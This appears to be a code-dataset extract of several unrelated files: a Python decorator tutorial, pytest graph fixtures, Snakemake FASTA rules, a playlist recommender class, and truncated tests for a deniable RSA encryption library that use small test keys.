] | null | null | null | REST/python-refresher-master/36_the_at_syntax_for_decorators/code.py | Rebell-Leader/bg | 616a40286fe1d34db2916762c477676ed8067cdb | [
"Apache-2.0"
] | null | null | null | user = {"username": "jose", "access_level": "guest"}
def make_secure(func):
def secure_function():
if user["access_level"] == "admin":
return func()
else:
return f"No admin permissions for {user['username']}."
return secure_function
@make_secure
def get_admin_password():
return "1234"
# -- keeping function name and docstring --
import functools
user = {"username": "jose", "access_level": "guest"}
def make_secure(func):
@functools.wraps(func)
def secure_function():
if user["access_level"] == "admin":
return func()
else:
return f"No admin permissions for {user['username']}."
return secure_function
@make_secure
def get_admin_password():
return "1234"
| 19.45 | 66 | 0.619537 | 90 | 778 | 5.177778 | 0.322222 | 0.103004 | 0.06867 | 0.094421 | 0.871245 | 0.871245 | 0.871245 | 0.871245 | 0.871245 | 0.871245 | 0 | 0.013675 | 0.248072 | 778 | 39 | 67 | 19.948718 | 0.782906 | 0.052699 | 0 | 0.916667 | 0 | 0 | 0.255782 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.083333 | 0.041667 | 0.083333 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
3af4bdf66e6be66fdb7af9d347b4cff0f2f73eae | 16,198 | py | Python | tests/conftest.py | googleinterns/userjourneytool | 0e70a7e8c66dd1d69faeccfb18ad02832bf561da | [
"Apache-2.0"
] | 3 | 2020-09-14T17:55:38.000Z | 2020-11-29T18:49:39.000Z | tests/conftest.py | googleinterns/userjourneytool | 0e70a7e8c66dd1d69faeccfb18ad02832bf561da | [
"Apache-2.0"
] | 50 | 2020-09-10T19:43:45.000Z | 2020-11-11T21:33:57.000Z | tests/conftest.py | googleinterns/userjourneytool | 0e70a7e8c66dd1d69faeccfb18ad02832bf561da | [
"Apache-2.0"
] | null | null | null | # pylint: disable=redefined-outer-name
import pytest
from graph_structures_pb2 import SLI, Client, Dependency, Node, NodeType, UserJourney
def pytest_addoption(parser):
parser.addoption(
"--local", action="store_true", default=False, help="run tests locally"
)
@pytest.fixture
def local(request):
return request.config.getoption("--local")
@pytest.fixture
def assert_same_elements():
def inner_assert_same_elements(list1, list2):
"""Asserts that two lists have the same elements, regardless of order.
We use this approach for unhashable and uncomparable types, e.g. proto messages.
Args:
list1: First list to assert.
list2: Second list to assert.
"""
# although it's slower/not strictly necessary to wrap the generator in
# a list, pytest will give a more informative error message this way.
assert len(list1) == len(list2)
assert all([element1 in list2 for element1 in list1])
assert all([element2 in list1 for element2 in list2])
return inner_assert_same_elements
@pytest.fixture
def slo_bounds():
return {
"slo_error_lower_bound": 0.1,
"slo_warn_lower_bound": 0.2,
"slo_warn_upper_bound": 0.8,
"slo_error_upper_bound": 0.9,
}
""" Example Node name message map data:
Service0 has children Endpoint0 and Endpoint1
Service1 has child Endpoint2
Endpoint0 depends on Endpoint1 and Endpoint2
Endpoint1 depends on Endpoint2
"""
@pytest.fixture
def example_node_name_message_map_service_relative_names():
service_relative_names = ["Service0", "Service1"]
return service_relative_names
@pytest.fixture
def example_node_name_message_map_endpoint_relative_names():
endpoint_relative_names = ["Endpoint0", "Endpoint1", "Endpoint2"]
return endpoint_relative_names
@pytest.fixture
def example_node_name_message_map(
slo_bounds,
example_node_name_message_map_service_relative_names,
example_node_name_message_map_endpoint_relative_names,
):
service_relative_names = example_node_name_message_map_service_relative_names
endpoint_relative_names = example_node_name_message_map_endpoint_relative_names
node_name_message_map = {
service_relative_names[0]: Node(
node_type=NodeType.NODETYPE_SERVICE,
name=service_relative_names[0],
child_names=[
f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
],
slis=[
SLI(
node_name=service_relative_names[0],
sli_value=0.5,
**slo_bounds,
),
],
),
service_relative_names[1]: Node(
node_type=NodeType.NODETYPE_SERVICE,
name=service_relative_names[1],
child_names=[f"{service_relative_names[1]}.{endpoint_relative_names[2]}"],
slis=[
SLI(
node_name=service_relative_names[1],
sli_value=0.5,
**slo_bounds,
),
],
),
f"{service_relative_names[0]}.{endpoint_relative_names[0]}": Node(
node_type=NodeType.NODETYPE_ENDPOINT,
name=f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
parent_name=service_relative_names[0],
dependencies=[
Dependency(
target_name=f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
source_name=f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
),
Dependency(
target_name=f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
source_name=f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
),
],
slis=[
SLI(
node_name=f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
sli_value=0.5,
**slo_bounds,
),
],
),
f"{service_relative_names[0]}.{endpoint_relative_names[1]}": Node(
node_type=NodeType.NODETYPE_ENDPOINT,
name=f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
parent_name=service_relative_names[0],
dependencies=[
Dependency(
target_name=f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
source_name=f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
),
],
slis=[
SLI(
node_name=f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
sli_value=0.5,
**slo_bounds,
),
],
),
f"{service_relative_names[1]}.{endpoint_relative_names[2]}": Node(
node_type=NodeType.NODETYPE_ENDPOINT,
name=f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
parent_name=service_relative_names[1],
slis=[
SLI(
node_name=f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
sli_value=0.5,
**slo_bounds,
),
],
),
}
return node_name_message_map
@pytest.fixture
def example_node_elements_from_node_map(
example_node_name_message_map_service_relative_names,
example_node_name_message_map_endpoint_relative_names,
):
service_relative_names = example_node_name_message_map_service_relative_names
endpoint_relative_names = example_node_name_message_map_endpoint_relative_names
expected_node_elements = [
{
"data": {
"id": service_relative_names[0],
"label": service_relative_names[0],
"ujt_id": service_relative_names[0],
},
"classes": "",
},
{
"data": {
"id": service_relative_names[1],
"label": service_relative_names[1],
"ujt_id": service_relative_names[1],
},
"classes": "",
},
{
"data": {
"id": f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
"label": endpoint_relative_names[0],
"parent": service_relative_names[0],
"ujt_id": f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
},
"classes": "",
},
{
"data": {
"id": f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
"label": endpoint_relative_names[1],
"parent": service_relative_names[0],
"ujt_id": f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
},
"classes": "",
},
{
"data": {
"id": f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
"label": endpoint_relative_names[2],
"parent": service_relative_names[1],
"ujt_id": f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
},
"classes": "",
},
]
return expected_node_elements
@pytest.fixture
def example_edge_elements_from_node_map(
example_node_name_message_map_service_relative_names,
example_node_name_message_map_endpoint_relative_names,
):
service_relative_names = example_node_name_message_map_service_relative_names
endpoint_relative_names = example_node_name_message_map_endpoint_relative_names
expected_edge_elements = [
{
"data": {
"source": f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
"target": f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
"id": f"{service_relative_names[0]}.{endpoint_relative_names[0]}/{service_relative_names[0]}.{endpoint_relative_names[1]}",
"ujt_id": f"{service_relative_names[0]}.{endpoint_relative_names[0]}/{service_relative_names[0]}.{endpoint_relative_names[1]}",
},
"classes": "",
},
{
"data": {
"source": f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
"target": f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
"id": f"{service_relative_names[0]}.{endpoint_relative_names[0]}/{service_relative_names[1]}.{endpoint_relative_names[2]}",
"ujt_id": f"{service_relative_names[0]}.{endpoint_relative_names[0]}/{service_relative_names[1]}.{endpoint_relative_names[2]}",
},
"classes": "",
},
{
"data": {
"source": f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
"target": f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
"id": f"{service_relative_names[0]}.{endpoint_relative_names[1]}/{service_relative_names[1]}.{endpoint_relative_names[2]}",
"ujt_id": f"{service_relative_names[0]}.{endpoint_relative_names[1]}/{service_relative_names[1]}.{endpoint_relative_names[2]}",
},
"classes": "",
},
]
return expected_edge_elements
""" Example client name message map data:
Client0 has UserJourneys UJ0 and UJ1
Client1 has UserJourneys UJ2
UJ0 depends on Service0 and Service1
UJ1 depends on Service2
UJ2 depends on Service3
"""
@pytest.fixture
def example_client_name_message_map_client_relative_names():
client_relative_names = ["Client0", "Client1"]
return client_relative_names
@pytest.fixture
def example_client_name_message_map_user_journey_relative_names():
user_journey_relative_names = ["UJ0", "UJ1", "UJ2"]
return user_journey_relative_names
@pytest.fixture
def example_client_name_message_map_service_relative_names():
service_relative_names = ["Service0", "Service1", "Service2", "Service3"]
return service_relative_names
@pytest.fixture
def example_client_name_message_map(
example_client_name_message_map_client_relative_names,
example_client_name_message_map_user_journey_relative_names,
example_client_name_message_map_service_relative_names,
):
client_relative_names = example_client_name_message_map_client_relative_names
user_journey_relative_names = (
example_client_name_message_map_user_journey_relative_names
)
service_relative_names = example_client_name_message_map_service_relative_names
client_name_message_map = {
client_relative_names[0]: Client(
name=client_relative_names[0],
user_journeys=[
UserJourney(
name=f"{client_relative_names[0]}.{user_journey_relative_names[0]}",
client_name=client_relative_names[0],
dependencies=[
Dependency(
target_name=service_relative_names[0],
source_name=f"{client_relative_names[0]}.{user_journey_relative_names[0]}",
toplevel=True,
),
Dependency(
target_name=service_relative_names[1],
source_name=f"{client_relative_names[0]}.{user_journey_relative_names[0]}",
toplevel=True,
),
],
),
UserJourney(
name=f"{client_relative_names[0]}.{user_journey_relative_names[1]}",
client_name=client_relative_names[0],
dependencies=[
Dependency(
target_name=service_relative_names[2],
source_name=f"{client_relative_names[0]}.{user_journey_relative_names[1]}",
toplevel=True,
),
],
),
],
),
client_relative_names[1]: Client(
name=client_relative_names[1],
user_journeys=[
UserJourney(
name=f"{client_relative_names[1]}.{user_journey_relative_names[2]}",
client_name=client_relative_names[1],
dependencies=[
Dependency(
target_name=service_relative_names[3],
source_name=f"{client_relative_names[1]}.{user_journey_relative_names[2]}",
toplevel=True,
),
],
),
],
),
}
return client_name_message_map
@pytest.fixture
def example_node_elements_from_client_map(
example_client_name_message_map_client_relative_names,
):
client_relative_names = example_client_name_message_map_client_relative_names
expected_node_elements = [
{
"data": {
"id": client_relative_names[0],
"label": client_relative_names[0],
"ujt_id": client_relative_names[0],
},
"classes": "",
},
{
"data": {
"id": client_relative_names[1],
"label": client_relative_names[1],
"ujt_id": client_relative_names[1],
},
"classes": "",
},
]
return expected_node_elements
@pytest.fixture
def example_edge_elements_from_client_map(
example_client_name_message_map_client_relative_names,
example_client_name_message_map_user_journey_relative_names,
example_client_name_message_map_service_relative_names,
):
client_relative_names = example_client_name_message_map_client_relative_names
user_journey_relative_names = (
example_client_name_message_map_user_journey_relative_names
)
service_relative_names = example_client_name_message_map_service_relative_names
expected_edge_elements = [
{
"data": {
"source": client_relative_names[0],
"target": service_relative_names[0],
"id": f"{client_relative_names[0]}/{service_relative_names[0]}",
"ujt_id": f"{client_relative_names[0]}/{service_relative_names[0]}",
"user_journey_name": f"{client_relative_names[0]}.{user_journey_relative_names[0]}",
},
"classes": "",
},
{
"data": {
"source": client_relative_names[0],
"target": service_relative_names[1],
"id": f"{client_relative_names[0]}/{service_relative_names[1]}",
"ujt_id": f"{client_relative_names[0]}/{service_relative_names[1]}",
"user_journey_name": f"{client_relative_names[0]}.{user_journey_relative_names[0]}",
},
"classes": "",
},
{
"data": {
"source": client_relative_names[0],
"target": service_relative_names[2],
"id": f"{client_relative_names[0]}/{service_relative_names[2]}",
"ujt_id": f"{client_relative_names[0]}/{service_relative_names[2]}",
"user_journey_name": f"{client_relative_names[0]}.{user_journey_relative_names[1]}",
},
"classes": "",
},
{
"data": {
"source": client_relative_names[1],
"target": service_relative_names[3],
"id": f"{client_relative_names[1]}/{service_relative_names[3]}",
"ujt_id": f"{client_relative_names[1]}/{service_relative_names[3]}",
"user_journey_name": f"{client_relative_names[1]}.{user_journey_relative_names[2]}",
},
"classes": "",
},
]
return expected_edge_elements
| 37.49537 | 143 | 0.591061 | 1,697 | 16,198 | 5.1868 | 0.086034 | 0.32788 | 0.220404 | 0.100205 | 0.843445 | 0.806294 | 0.773688 | 0.748693 | 0.721313 | 0.692343 | 0 | 0.020964 | 0.302074 | 16,198 | 431 | 144 | 37.582367 | 0.757629 | 0.024571 | 0 | 0.516484 | 0 | 0 | 0.26898 | 0.226657 | 0 | 0 | 0 | 0 | 0.016484 | 1 | 0.043956 | false | 0 | 0.005495 | 0.005495 | 0.087912 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
aafb3fe45b726413782e891759e2d8640f5b1038 | 2,230 | py | Python | piRNA_analysis/snakemake/12_table_to_fasta_v3.py | rberrens/SPOCD1-piRNA_directed_DNA_met | 8e795436197ef41f07159624e45d6b0fddb1ded8 | [
"MIT"
] | 4 | 2020-07-17T12:03:38.000Z | 2021-03-11T03:30:20.000Z | piRNA_analysis/snakemake/12_table_to_fasta_v3.py | rberrens/SPOCD1-piRNA_directed_DNA_met | 8e795436197ef41f07159624e45d6b0fddb1ded8 | [
"MIT"
] | null | null | null | piRNA_analysis/snakemake/12_table_to_fasta_v3.py | rberrens/SPOCD1-piRNA_directed_DNA_met | 8e795436197ef41f07159624e45d6b0fddb1ded8 | [
"MIT"
] | 1 | 2021-08-15T07:11:52.000Z | 2021-08-15T07:11:52.000Z | configfile: 'config_spocd1_pi_simple.yaml'
cutadapt = "/usr/local/bin/cutadapt"
bowtie = "/usr/local/Cellar/bowtie/1.2.1.1/bin/bowtie"
rule all:
input:
expand("Processed/v3/fasta/spocd1_pi_IAPEz_{sample}.fasta", sample = config["samples"]),
expand("Processed/v3/fasta/spocd1_pi_IAPEy_{sample}.fasta", sample = config["samples"]),
expand("Processed/v3/fasta/spocd1_pi_L1MdA_{sample}.fasta", sample = config["samples"]),
expand("Processed/v3/fasta/spocd1_pi_L1MdT_{sample}.fasta", sample = config["samples"]),
expand("Processed/v3/fasta/spocd1_pi_L1MdGf_{sample}.fasta", sample = config["samples"]),
expand("Processed/v3/fasta/spocd1_pi_L1MdF2_{sample}.fasta", sample = config["samples"])
rule IAPEz:
input:
table = "Processed/v3/view/spocd1_pi_IAPEz_{sample}.txt"
output:
fasta = "Processed/v3/fasta/spocd1_pi_IAPEz_{sample}.fasta"
shell:
"""
perl ../perl/table_to_fasta.pl {input.table} > {output.fasta}
"""
rule IAPEy:
input:
table = "Processed/v3/view/spocd1_pi_IAPEy_{sample}.txt"
output:
fasta = "Processed/v3/fasta/spocd1_pi_IAPEy_{sample}.fasta"
shell:
"""
perl ../perl/table_to_fasta.pl {input.table} > {output.fasta}
"""
rule L1MdA:
input:
table = "Processed/v3/view/spocd1_pi_L1MdA_{sample}.txt"
output:
fasta = "Processed/v3/fasta/spocd1_pi_L1MdA_{sample}.fasta"
shell:
"""
perl ../perl/table_to_fasta.pl {input.table} > {output.fasta}
"""
rule L1MdT:
input:
table = "Processed/v3/view/spocd1_pi_L1MdT_{sample}.txt"
output:
fasta = "Processed/v3/fasta/spocd1_pi_L1MdT_{sample}.fasta"
shell:
"""
perl ../perl/table_to_fasta.pl {input.table} > {output.fasta}
"""
rule L1MdGf:
input:
table = "Processed/v3/view/spocd1_pi_L1MdGf_{sample}.txt"
output:
fasta = "Processed/v3/fasta/spocd1_pi_L1MdGf_{sample}.fasta"
shell:
"""
perl ../perl/table_to_fasta.pl {input.table} > {output.fasta}
"""
rule L1MdF2:
input:
table = "Processed/v3/view/spocd1_pi_L1MdF2_{sample}.txt"
output:
fasta = "Processed/v3/fasta/spocd1_pi_L1MdF2_{sample}.fasta"
shell:
"""
perl ../perl/table_to_fasta.pl {input.table} > {output.fasta}
"""
| 30.135135 | 94 | 0.676682 | 295 | 2,230 | 4.881356 | 0.125424 | 0.105556 | 0.133333 | 0.183333 | 0.875 | 0.861806 | 0.857639 | 0.720139 | 0.651389 | 0.468056 | 0 | 0.032516 | 0.158744 | 2,230 | 74 | 95 | 30.135135 | 0.735075 | 0 | 0 | 0.404255 | 0 | 0 | 0.570618 | 0.546795 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c9194344f040afc641007e369d934ebb05c21134 | 5,017 | py | Python | recommenders/script/main/top_pop_p.py | edervishaj/spotify-recsys-challenge | 4077201ac7e4ed9da433bd10a92c183614182437 | [
"Apache-2.0"
] | 3 | 2018-10-12T20:19:57.000Z | 2019-12-11T01:11:38.000Z | recommenders/script/main/top_pop_p.py | kiminh/spotify-recsys-challenge | 5e7844a77ce3c26658400f161d2d74d682f30e69 | [
"Apache-2.0"
] | null | null | null | recommenders/script/main/top_pop_p.py | kiminh/spotify-recsys-challenge | 5e7844a77ce3c26658400f161d2d74d682f30e69 | [
"Apache-2.0"
] | 4 | 2018-10-27T20:30:18.000Z | 2020-10-14T07:43:27.000Z | from utils.datareader import Datareader
from utils.post_processing import eurm_remove_seed
import numpy as np
import scipy.sparse as sps
from tqdm import tqdm
import sys
class Top_pop_p(object):
'''
Class that allow the user to get the personalized top pop build following track or album
'''
def __init__(self):
1
def get_top_pop_album(self, mode):
'''
:return: csr_matrix filled with the reccomendation for the cat 2 following album
'''
if mode == "online":
self.dr_on = Datareader(verbose=False, mode='online', only_load=True)
self.urm_on = self.dr_on.get_urm()
self.urm_col = sps.csc_matrix(self.urm_on)
self.top_p = np.zeros(self.urm_on.shape[1])
eurm = sps.lil_matrix(self.urm_on.shape)
pids = self.dr_on.get_test_pids(cat=2)
pids_all = self.dr_on.get_test_pids()
ucm_album = self.dr_on.get_ucm_albums().tocsc()
album_dic = self.dr_on.get_track_to_album_dict()
for row in tqdm(pids):
track_ind = self.urm_on.indices[self.urm_on.indptr[row]:self.urm_on.indptr[row + 1]][0]
album = album_dic[track_ind]
playlists = ucm_album.indices[ucm_album.indptr[album]:ucm_album.indptr[album+1]]
top = self.urm_on[playlists].sum(axis=0).A1.astype(np.int32)
track_ind_rec = top.argsort()[-501:][::-1]
eurm[row, track_ind_rec] = top[track_ind_rec]
eurm = eurm.tocsr()[pids_all]
eurm = eurm_remove_seed(eurm, self.dr_on)
elif mode == "offline":
self.dr_of = Datareader(verbose=False, mode='offline', only_load=True)
self.urm_of = self.dr_of.get_urm()
self.urm_col = sps.csc_matrix(self.urm_of)
self.top_p = np.zeros(self.urm_of.shape[1])
eurm = sps.lil_matrix(self.urm_of.shape)
pids = self.dr_of.get_test_pids(cat=2)
pids_all = self.dr_of.get_test_pids()
ucm_album = self.dr_of.get_ucm_albums().tocsc()
album_dic = self.dr_of.get_track_to_album_dict()
for row in tqdm(pids):
track_ind = self.urm_of.indices[self.urm_of.indptr[row]:self.urm_of.indptr[row + 1]][0]
album = album_dic[track_ind]
playlists = ucm_album.indices[ucm_album.indptr[album]:ucm_album.indptr[album+1]]
top = self.urm_of[playlists].sum(axis=0).A1.astype(np.int32)
track_ind_rec = top.argsort()[-501:][::-1]
eurm[row, track_ind_rec] = top[track_ind_rec]
eurm = eurm.tocsr()[pids_all]
eurm = eurm_remove_seed(eurm, self.dr_of)
return eurm.copy().tocsr()
def get_top_pop_track(self, mode):
'''
:return: csr_matrix filled with the reccomendation for the cat 2 following track
'''
if mode == "online":
self.dr_on = Datareader(verbose=False, mode='online', only_load=True)
self.urm_on = self.dr_on.get_urm()
self.urm_col = sps.csc_matrix(self.urm_on)
self.top_p = np.zeros(self.urm_on.shape[1])
eurm = sps.lil_matrix(self.urm_on.shape)
pids = self.dr_on.get_test_pids(cat=2)
pids_all = self.dr_on.get_test_pids()
for row in tqdm(pids):
track_ind = self.urm_on.indices[self.urm_on.indptr[row]:self.urm_on.indptr[row + 1]][0]
playlists = self.urm_col.indices[ self.urm_col.indptr[track_ind]: self.urm_col.indptr[track_ind+1]]
top = self.urm_on[playlists].sum(axis=0).A1.astype(np.int32)
track_ind_rec = top.argsort()[-501:][::-1]
eurm[row, track_ind_rec] = top[track_ind_rec]
eurm = eurm.tocsr()[pids_all]
eurm = eurm_remove_seed(eurm, self.dr_on)
elif mode == "offline":
self.dr_of = Datareader(verbose=False, mode='offline', only_load=True)
self.urm_of = self.dr_of.get_urm()
self.urm_col = sps.csc_matrix(self.urm_of)
self.top_p = np.zeros(self.urm_of.shape[1])
eurm = sps.lil_matrix(self.urm_of.shape)
pids = self.dr_of.get_test_pids(cat=2)
pids_all = self.dr_of.get_test_pids()
for row in tqdm(pids):
track_ind = self.urm_of.indices[self.urm_of.indptr[row]:self.urm_of.indptr[row + 1]][0]
playlists = self.urm_col.indices[self.urm_col.indptr[track_ind]: self.urm_col.indptr[track_ind + 1]]
top = self.urm_of[playlists].sum(axis=0).A1.astype(np.int32)
track_ind_rec = top.argsort()[-501:][::-1]
eurm[row, track_ind_rec] = top[track_ind_rec]
eurm = eurm.tocsr()[pids_all]
eurm = eurm_remove_seed(eurm, self.dr_of)
return eurm.copy().tocsr()
if __name__ == '__main__':
t = Top_pop_p()
t.get_top_pop_album("online")
| 38.592308 | 116 | 0.600359 | 744 | 5,017 | 3.771505 | 0.126344 | 0.104775 | 0.051319 | 0.031361 | 0.880257 | 0.880257 | 0.880257 | 0.870278 | 0.848182 | 0.848182 | 0 | 0.015152 | 0.27646 | 5,017 | 129 | 117 | 38.891473 | 0.757851 | 0.049831 | 0 | 0.790698 | 0 | 0 | 0.014028 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034884 | false | 0 | 0.069767 | 0 | 0.139535 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c960becc35813b427957e265cb6939a6dbcff05f | 151,603 | py | Python | tests/test_deniable.py | victormn/deniable-encryption | 905c4e31e17cc99e904015e8de55b1a525469b95 | [
"MIT"
] | 3 | 2017-10-07T07:18:39.000Z | 2021-06-04T22:15:54.000Z | tests/test_deniable.py | victormn/rsa-deniable-encryption | 905c4e31e17cc99e904015e8de55b1a525469b95 | [
"MIT"
] | 3 | 2017-10-24T14:16:05.000Z | 2017-10-29T17:27:28.000Z | tests/test_deniable.py | victormn/deniable-encryption | 905c4e31e17cc99e904015e8de55b1a525469b95 | [
"MIT"
] | null | null | null | """Tests for rsa.py and collision.py (with deniability)."""
from deniable.collision import collision_finder
from deniable.rsa import decryption
def test_collision_finder():
"""Can we properly use the collision finder?"""
cipher = "7928186168759"
sec = """-----BEGIN RSA PRIVATE KEY-----
MDECAQACBghK5FNUlwIDAQABAgYCIgDwCMECAyqx9QIDMbjbAgMWsskCAwX2/QID
D3n/
-----END RSA PRIVATE KEY-----"""
mes1 = "bar"
sec_d = collision_finder(mes1, cipher, sec)
assert sec_d == """-----BEGIN RSA PRIVATE KEY-----
MDQCAQACBghK5FNUlwIDAQABAgkFck+wk/ieerACAyqx9QIDMbjbAgMkY0QCAypP
7gIDD3n/
-----END RSA PRIVATE KEY-----"""
def test_decrypt_message_denied():
"""Can we properly decrypt a denied message?"""
cipher = "7928186168759"
sec = """-----BEGIN RSA PRIVATE KEY-----
MDQCAQACBghK5FNUlwIDAQABAgkFck+wk/ieerACAyqx9QIDMbjbAgMkY0QCAypP
7gIDD3n/
-----END RSA PRIVATE KEY-----"""
mes = decryption(cipher, sec)
assert mes == "bar"
def test_deny_message():
"""Can we properly deny a message?"""
cipher = "00740303006001900113789076518000456984144044700800303856820901091236702240501205319988186301372889025530101556634890308301273819318565901608984644136600203221664303100482445572502100441338037670400402907464144600707024420090900294579089155001603453199579000472856000181400850970236089500959784444213100449000840380401038074839011700293239062252401672235190958200020795192897101049148854637300609307458562101517468217887200171476651885800185168575013901564369128793900766260362584100332853795991600452822702421801196082423928801600725959736200944013654439200988169068122200236527826680300150038192815300853150258639300185168575013901242451404801601108299196936200219829849383000729540254353701028620015850601402509492508701186199849290801285589104392101338577796492601424928695775000387618266749100441793086078600773681487057700817197362482300034310695559000279900672325101268152273743301543323550795301520361961151600274675441052001479633112508400154792562348801169002046808100510884968736400724085955124300048974023575400670517143258901231699089415701264795724587201447700982741600579624497503500865621568234100742193370688900487206900635000202686444156200482445572502101527059084532501231699089415700930782279292300763231454373701541479622316100155012636405001418925986709501593098003532801042793838875600714616394458200921958752339401114773366500400384734042151900996575755108700096463428062501384249879123901591627208364301231699089415701627472694842200296037487640900600262782417000034310695559001507208515349100578072956278400582611857111101357922596835600203221664303101436542516735200437380541045900133429374391300015750224544800364555208829801545940487527300952768828893100632547371236500303594609223200111502271074600857422749974200133429374391300518548900823700534950955524400230920093604401324559822660600068430039003400865621568234100518473153963500624511060354900974627408906400857422749974200186284908044700131007152643900940073351696201324559822660600013662484812101304622852781800699794952341500377059764773800743797255706701264795724587200794037296817700959784444213100279900672325101268152273743301543323550795300742193370688901454047390283001370769150758301031706109617101268878462476301076273607848200073150358634501437652609630301624907990486000512819318835500425475498510400300019495023001442292991548201372889025530100162919830824300155012636405000628191424677501535562442967601575192070819400944013654439200609307458562100075207432484700545420188818901157390855127600452217309026600996581711468300253936483648100743797255706700417756301360800846008544716500701820347996000954805729193801016497134226501269419874188501264795724587201520361961151600025681255430600150038192815300853150258639300185168575013901188190694710500520920666518600081893145046200172241730348400298903238958800276140686173500217711846910100944013654439200417756301360800846008544716500280916374605200743702213770100959784444213101535562442967601463427784036900996602331502900584317564144600482445572502100441338037670400402907464144600707024420090900150038192815300853150258639300185168575013900431026765308901270947728316401441843438443200804729531596401154167290936200881204803763400412927489443900081893145046201483428709984900898211870581300024131188842701197365000041801336156586956201155833182625801402509492508700084571530291800779362387637500217673955801900303594609223200431026765308901603374057404500853150258639300945517385352201307841312816900919562789393901517468217887201052084788716500804729531596400260637035518301291983314150600051743937593101323521284563901324559822660600842378973031000545420188818901197365000041801493275444681301389383047261500475585151099801525530039235401556506228272601439743491672701339146772249500015750224544800435350656915000433353986715100170094763690300816764766225101593098003532800609307458562101517468217887201545940487527300952768828893100632547371236500083849109711901129491676341100013407182756201439743491672700673080371527700271507021711100043597654901501544288600886800843817174903300268599210913001527081817842301587817495374900081893145046201675938226680600203221664303101141678075507501254700394242401489403245893001041179679887801554702055590900441793086078600687888286223501114179097989500681874101571500961967918846000875330257907301535050448225100185168575013900219829849383000812246962301100741402586934001485147377661200185168575013900909989313546500004692668326900460187500342101120652525045700298903238958801672235190958201675938226680600449982914570001095406555384700939183300233900996575755108700860637262964300178197645915800931421401422600447367425012600150626828498701630929741028800303316881346301535050448225100185168575013900406551205357200367733112613300715495763002400336783868272400339421812363801654197036860201007517338312300307623582225501356307218710700855177808492701338698133603400279900672325101273819318565901242451404801601108299196936200975323677823500919562789393901517468217887200128123521054900856576665865700965531702562801313710834757600804729531596401517468217887200336783868272400339421812363801654197036860201438274608369000985778754772900762121975194000501251182573600552684965085301006744972845000914447367500900988169068122200526711694146401164737370095001283052504118700766260362584100066404497751300474806725923901614065563301500924434495966800429694926273500094198558471501421239884468101275199383969000658331248283500544642778869300404840386635001436542516735200437380541045900133429374391301015119129618700177055035980400894913070287101381170776337500486407911714101328299696186900053171009143101283052504118700766260362584100066404497751300474806725923900701820347996000111470138126000262055450945700086840925525001656734087197500894913070287101381170776337500486407911714101520361961151600025681255430601450838483522800930782279292300763231454373700705631834325100253936483648100743797255706701545940487527301155833182625800632547371236500342323733073201290090244961000914447367500901324559822660600013662484812101304622852781800366843543850700762121975194000371101511745500406551205357200367733112613301543416866956500729540254353701028620015850601264228528182501320386054784801670886160273000582611857111101667446916570300209947898195300171476651885801523251945517100609307458562100246507117013400743657727421901333350725531401416650036565000996602331502900584317564144601379457918873801339146772249501349341137642400566902829097700043865844183900054386410476800036081908532500376288565993500639174162429901416650036565000808003191989500003657655808100011709798744000811464219878400162919830824301535852334093001114179097989501434246506527101628028383769100919562789393901320386054784800822549440088700891859093714700111502271074600857422749974201579027146565700894913070287101381170776337500486407911714100498562072021500513770356886400857422749974201295129138449600684840497722700665883387729801463427784036901228325316456301339146772249500482445572502100132162786555901545940487527300203541348405201382953302227501022210647843400084571530291800779362387637501506276116256100620068022811600693051520561800729540254353701028620015850601197365000041801052286979389401484358600590401337299441625001485147377661200822062867100200307761204761500954805729193801261446935222900904491175566401418925986709500642089479341801436542516735200437380541045900133429374391301417751668764600396392883247801541479622316101656734087197501535562442967601575192070819400314729751661000298903238958800650883421465800856576665865700501251182573600552684965085301320386054784801270947728316401245592057217600400692793633800890246804487900155373737412400724085955124300308119172638100763615093422401052